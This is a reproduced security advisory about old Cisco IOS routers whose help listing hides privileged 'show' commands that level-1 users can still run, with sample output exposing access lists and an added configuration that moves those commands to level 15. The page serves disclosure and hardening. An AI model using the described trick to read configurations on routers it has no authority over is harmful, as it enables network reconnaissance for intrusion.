Cisco Router Online Help Vulnerability
As taken from the original post on this vulnerability (see the Credit section):

Routers tested: 2500, 2600, 3600, 4000, 7200, 7500 series, running IOS 9.14, 11.1(21) (Distributed Director), 11.2(x) and 12.0(x). Some were tested on the local console, some over Telnet. We recently tested PIX 4.x, and found it was NOT vulnerable.

A regular user will log on with privilege level equal to 1. This can be shown by running "show privilege" after logging on the router. For example:

    User Access Verification
    Username: joeuser
    Password: <password>
    Router2>sh priv
    Current privilege level is 1
    Router2>

Now, if we try to get a list of all possible "show" commands, by doing "show ?", we get:

    Router2>show privilege
    Current privilege level is 1
    Router2>show ?
      backup     Backup status
      cef        Cisco Express Forwarding
      clock      Display the system clock
      dialer     Dialer parameters and statistics
      flash:     display information about flash: file system
      history    Display the session command history
      ...

Notice that we did not see an "access-lists" option, so the help system thinks we should not be able to run it... However,

    Router2>show privilege
    Current privilege level is 1
    Router2>show access-lists
    Standard IP access list 10
        permit 172.16.0.1
        deny   any
    Extended IP access list eth0-IN
        permit udp host 172.16.0.1 10.11.12.0 0.0.0.255 eq snmp (14982 matches)
        permit udp host 172.16.0.1 10.11.13.128 0.0.0.127 eq snmp (4026 matches)

So, we can see the configuration, even though we shouldn't. We can't alter it, but even seeing the access-list is beneficial to an attacker.

Upon further testing on a 3640 running IOS 12.0(5), we got the following results:

- We found 75 "show" commands that are supposed to be available only in enable mode. Meaning: the difference between "show ?" in enabled and disabled mode was these 75 commands.
- Out of 75, only 13 were truly restricted. The other 62 were available to be viewed by a session in disabled mode.
- Out of the 62 that were viewable, we counted 7 as being potentially very dangerous. "show ip" is one of them, as well as "show cdp", "show logging", "show cdp", "show vlans". There are others, but I don't have my list with me right now.
- By combining "show ip" and "show access-lists" we had a very clear picture of how access-lists were distributed in the router.
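The post shows that the "show ?" help listing and the command parser disagree about what a level-1 session may run, so the help output cannot be used as evidence of what is restricted. The configuration below is an added example written for this page; it is not from the original post or from Cisco, and it assumes an IOS release that supports the "privilege exec level" global configuration command. It moves the "show" commands the post names to privilege level 15 so that an unprivileged session can no longer run them, and then verifies the result the same way the post tested it: by logging in as a level-1 user and trying the command.

```cisco
! Added example (not part of the original post): explicitly assign the
! commands the post found readable at level 1 to privilege level 15.
! Assumes "privilege exec level" is available on the running IOS version.
configure terminal
 privilege exec level 15 show access-lists
 privilege exec level 15 show ip
 privilege exec level 15 show cdp
 privilege exec level 15 show logging
 privilege exec level 15 show vlans
 end
!
! Keep the change across reloads.
write memory
!
! Verification, from a fresh session as a level-1 user (same check the
! post used): "show privilege" must report level 1, and the reassigned
! commands must now be rejected by the parser rather than executed.
show privilege
show access-lists
show ip
!
! From an enable (level 15) session, confirm the lines are present in the
! saved configuration.
show running-config
```

Two points worth knowing when applying this: assigning a command such as "show ip" to a level also assigns every command that begins with it (for example "show ip route") to that level, so check that level-1 operators who legitimately need a sub-command are not locked out; and the help listing still cannot be trusted as a test, so the check is always to run the command from a level-1 session, not to look at "show ?".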